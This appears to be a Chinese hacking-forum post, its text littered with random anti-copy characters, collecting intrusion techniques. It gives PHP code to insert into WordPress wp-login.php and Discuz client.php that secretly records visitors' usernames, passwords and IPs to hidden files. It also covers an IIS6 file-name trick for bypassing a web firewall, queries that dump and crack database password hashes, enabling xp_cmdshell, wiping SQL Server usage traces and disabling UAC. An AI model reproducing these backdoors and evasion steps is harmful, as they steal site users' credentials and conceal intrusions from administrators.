$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;. T* k! d: l; G3 d# j+ _* R. K  U4 A
$txt=$txt.”\r\n”;
; i% V% J3 L/ l( v1 f7 pif($log_user&&$log_pwd&&$log_ip){
+ M5 d2 S3 {+ V) @; H@fwrite(fopen(‘pwd.txt’,”a+”),$txt);; m) d- P9 Z/ w# `
}, `/ }2 q/ v: a' t
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。' {2 X! Y) a4 f$ H5 z6 [
就是搜索case ‘login’
) |8 G; c9 c" ]- i* S+ C在它下面直接插入即可,记录的密码生成在pwd.txt中,( T1 m% ?2 m# p1 m% z; B3 x) d
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
; K. Q9 D& w' f8 n7 X" j利用II6文件解析漏洞绕过安全狗代码:' A$ n; ]( [( ~  ~7 f% g
;antian365.asp;antian365.jpg
4 d( F5 r0 l3 T+ b" d9 j: L- h. z4 |2 ^. r5 Y
各种类型数据库抓HASH破解最高权限密码!
+ K' a, o: e5 O4 f8 e5 k4 O) Z1.sql server20000 {9 l$ x5 \9 _3 y" X9 A& e
SELECT password from master.dbo.sysxlogins where name='sa'& d: F6 u# S! F8 H% T+ N
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341% [# O/ S' R' l
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A  |+ u% g1 X# `9 c$ L* t" \& V
0 M) ]* |$ N( X/ U- n/ f8 {/ p3 `
0×0100- constant header
/ W% }8 E) O( P4 i34767D5C- salt
4 U" e; A) h0 B$ l+ [' |0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash1 c  o8 R( M9 W9 ^2 \2 Y0 @% [
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash( k; L% E! s1 ]# q- [. V
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash# Q% r0 M8 e6 q1 y# l- A
SQL server 2005:-
8 _3 _' E' \# {# c; `SELECT password_hash FROM sys.sql_logins where name='sa'& O2 \- ]/ a, i: i. X% g8 n
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F" Y) V$ |4 t) }7 E9 R! V% k5 b
0×0100- constant header
! O4 C2 B; K( y5 V+ C993BF231-salt
2 r/ P$ O( L; M; T5 S% j- I- b5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash0 ~# h. W  i# \0 o/ J
crack case sensitive hash in cain, try brute force and dictionary based attacks.
# H; Y5 U* R' k! u4 u+ D
* R1 d0 U" @/ a/ ?update:- following bernardo’s comments:-
0 q/ @& e$ D& }& r7 E8 juse function fn_varbintohexstr() to cast password in a hex string.+ u/ m) n. P# k/ l
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins8 N% f% J% n2 w  w6 H0 \: f
/ [: y4 c5 f7 A6 j# c( ~
MYSQL:-
" ^9 q5 _, ~/ o- c# L  N" y
" A- o0 t$ B; w9 bIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
1 u" T4 ]; z( v: B& m" v
6 K+ ~: Y, Y, a: n0 |# Y*mysql  < 4.1% p, B$ c$ \1 z0 J+ t
, t2 f4 \: h, ^. h7 q4 P$ M) s
mysql> SELECT PASSWORD(‘mypass’);3 }6 l7 q  J* a9 {: k
+——————–+$ z/ p, n2 b( p. @4 O
| PASSWORD(‘mypass’) |
% g) \9 @4 U/ I/ T2 g3 V+——————–+
! o4 `1 x% v0 e' b& E3 Z2 C| 6f8c114b58f2ce9e   |* @! Q; ~3 o+ F" l) f
+——————–+; A& T# S* H" |) N9 w$ F% ~1 a

; S% _& [+ B4 E" D8 x3 I3 Y*mysql >=4.19 x; W3 m4 E. S# U
) p* I7 a1 q' j
mysql> SELECT PASSWORD(‘mypass’);
* ]% m3 e2 J- ?3 R" g1 h+——————————————-+
9 Y: ?: x- }! K4 J9 s/ N& y| PASSWORD(‘mypass’)                        |
. w1 r0 v  x+ q) E' _( R+——————————————-+
' s8 I6 I$ a' g* || *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |: a; z- n4 g( T6 Y1 B
+——————————————-+
0 o1 T1 S6 [, W+ {/ z' z& s
% c. ?) v$ U% Q- q: |0 z# D2 qSelect user, password from mysql.user* D7 ?# g8 L) z( r6 E% x
The hashes can be cracked in ‘cain and abel’
: }. C6 ]4 E# e# {& ~1 Y- I; Z4 X
1 R, d: D+ t' Q, c8 {9 ]Postgres:-1 O9 m! \' }* C- E, d
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)! ?, l9 r* K/ w' A' u" A( K
select usename, passwd from pg_shadow;
) y1 a8 R# _: pusename      |  passwd
8 _1 q0 ~: f* z% M7 N! x, n——————+————————————-
  X, `' O4 A" L/ ?8 r* @) w6 Vtestuser            | md5fabb6d7172aadfda4753bf0507ed4396
/ k0 X' w& M( ?1 S# Uuse mdcrack to crack these hashes:-( p( Z: r5 r' }  k2 Y
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396$ `+ x4 c% @. ]1 O% h
6 f2 q9 m, u' l) u
Oracle:-
7 l* M6 ^9 @: v8 Z" p8 W, @select name, password, spare4 from sys.user$
$ t$ r/ x4 V+ |/ Khashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g% X1 w. \# m3 p5 g; ]! Q
More on Oracle later, i am a bit bored….
) U  H& H  S$ ]6 f, X  L
/ Y2 C, K2 h: n  s* O: |
  ^1 d- g' o, t4 b( g1 K! L1 d在sql server2005/2008中开启xp_cmdshell. g' k3 y3 x: k; l- o9 k/ @
-- To allow advanced options to be changed.( v5 y& n& @+ r( o6 n' w. v
EXEC sp_configure 'show advanced options', 1
8 ?4 c$ w/ x; H8 T5 |GO- a/ M. x2 {; ]* O
-- To update the currently configured value for advanced options.1 ^1 t' _! Y% t2 ^
RECONFIGURE
  k' ?  T8 U+ u8 D& z3 e6 `0 |GO0 A0 K% y, V% j0 O3 D$ A
-- To enable the feature.5 c3 b/ y* W$ o: a
EXEC sp_configure 'xp_cmdshell', 11 H, L1 p5 [  `2 x8 ^% J
GO! a3 g' U) h- f" j. o6 L7 B$ s! Q; S
-- To update the currently configured value for this feature.
! N- O$ G. R( F: ?3 jRECONFIGURE
. q2 o  W# O/ Q9 J- t4 @# z1 rGO
* S  @$ l3 u7 y0 W- zSQL 2008 server日志清除,在清楚前一定要备份。* K9 ^3 P/ s6 P- d- V" ?! F
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
/ T4 Z: l6 l- I# c+ p& i% n3 oX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
2 H1 t  I8 @' {$ {* r/ I7 x# _
' w& J; N; R& L! U对于SQL Server 2008以前的版本:
. l# L" d+ ^  H1 H# X) W+ ^SQL Server 2005:
- K0 g9 e* d0 B, p% a删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat: ]4 r) h; `: g; L
SQL Server 2000:
' u+ L# f( u7 ~" ^0 h1 W# e清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。5 x/ ]( Z# h9 I, p5 _5 U; w. N4 N: X

9 m; g' d- ?2 I+ x本帖最后由 simeon 于 2013-1-3 09:51 编辑. J* D, \$ U0 a+ u; S
4 o# o( u7 K, Y8 q/ h  v! ?
8 S" u& L3 u- B! S4 n  w: r
windows 2008 文件权限修改0 d6 |% u  E# j8 T, h8 N
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx, G% Z7 K8 J5 H+ X/ U: w( r
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
3 a. _* a" A: A8 j一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,& ~4 I- u+ o$ L% k

% E! X5 F  ~; K$ L) z' _, EWindows Registry Editor Version 5.00
. \5 M/ r" |# B$ `! m8 ^  G2 u3 l[HKEY_CLASSES_ROOT\*\shell\runas]
0 _5 P) m* f" [6 f% c' h@="管理员取得所有权"7 Y1 T, x9 A, P- P: b
"NoWorkingDirectory"=""
9 M( t; S: P" x% Q% e[HKEY_CLASSES_ROOT\*\shell\runas\command]
4 \2 x' y6 f. L1 L: L  E9 T@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& E: r8 z. R+ B+ x9 `4 k! T"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
* z  V. F& {7 c! x7 _[HKEY_CLASSES_ROOT\exefile\shell\runas2]
- c' v8 \6 M2 ]) l& B@="管理员取得所有权"" p9 b( v7 _. |
"NoWorkingDirectory"=""$ \8 S3 k. p7 k, X8 G4 b
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]& y8 s4 l8 K, n+ ?
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
! e! }+ g' ]1 S5 \0 e"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
2 s4 p$ F# W4 K6 n4 |- m/ S. S
) M" \* S) b6 E5 E  T. V[HKEY_CLASSES_ROOT\Directory\shell\runas]
5 C! x( {" N9 J, R! K( p@="管理员取得所有权"7 X# L: U  Q, d7 `
"NoWorkingDirectory"=""
/ ~/ M* {2 l7 @$ l[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
* Q& T# x5 i1 ]6 m@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"* P2 P: z$ S: Q9 v! ~, q, s: G
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
5 H; [6 j7 t" \$ s* _- d9 d- S4 {& O1 E
6 m2 D: T# n+ q8 r
win7右键“管理员取得所有权”.reg导入) q0 X% E% F6 V* i0 |
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
7 @' ^, o# A8 a. p1、C:\Windows这个路径的“notepad.exe”不需要替换
, R0 A5 t9 D3 a8 K' Y: K2、C:\Windows\System32这个路径的“notepad.exe”不需要替换6 s1 r1 R. C& T/ H* [5 L
3、四个“notepad.exe.mui”不要管  {% y* w1 t" v3 y/ n
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
7 ]; r5 ?6 O! {0 c) W/ X$ g2 tC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”4 [. K% G+ P2 `) i# y
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
8 \* J" s( [( L$ L- ?替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
& H. z( w7 Q$ R( I3 c& Bwindows 2008中关闭安全策略: . h1 _) C- @0 I; D0 H4 o; B
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
% f; w, b: f1 d  B6 v5 E$ C修改uc_client目录下的client.php 在
! }- F7 z# o+ A$ O) Ofunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {; B, N1 i/ r' v. N' A
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
; A+ ~, i; i% `3 V  H6 b% h你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw8 l3 K3 e; ?$ P, j: ~6 M/ L0 v6 O7 \
if(getenv('HTTP_CLIENT_IP')) {9 {, l" ?8 q# H5 H3 x3 {
$onlineip = getenv('HTTP_CLIENT_IP');
; q' r$ V/ @8 a5 l' ~} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
2 X- Y0 m  r8 Y4 b6 o$onlineip = getenv('HTTP_X_FORWARDED_FOR');
/ r: n, a. @0 O, j0 [0 v} elseif(getenv('REMOTE_ADDR')) {
% Q- g! @, H% I! {$ j$ H$onlineip = getenv('REMOTE_ADDR');
3 j" x) a, k& Y} else {- }" C+ E, W5 y
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];2 _. w, J& M. ^) ~# B. v& y" o
}
6 g6 {5 @5 f$ ?% i/ |     $showtime=date("Y-m-d H:i:s");
$ p+ m$ U, f& W( v- G" I    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
+ L! W7 f; Q  Z1 C' V2 t4 d9 r    $handle=fopen('./data/cache/csslog.php','a+');, x  ~0 n  X* O/ K( w+ L5 ~, w
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表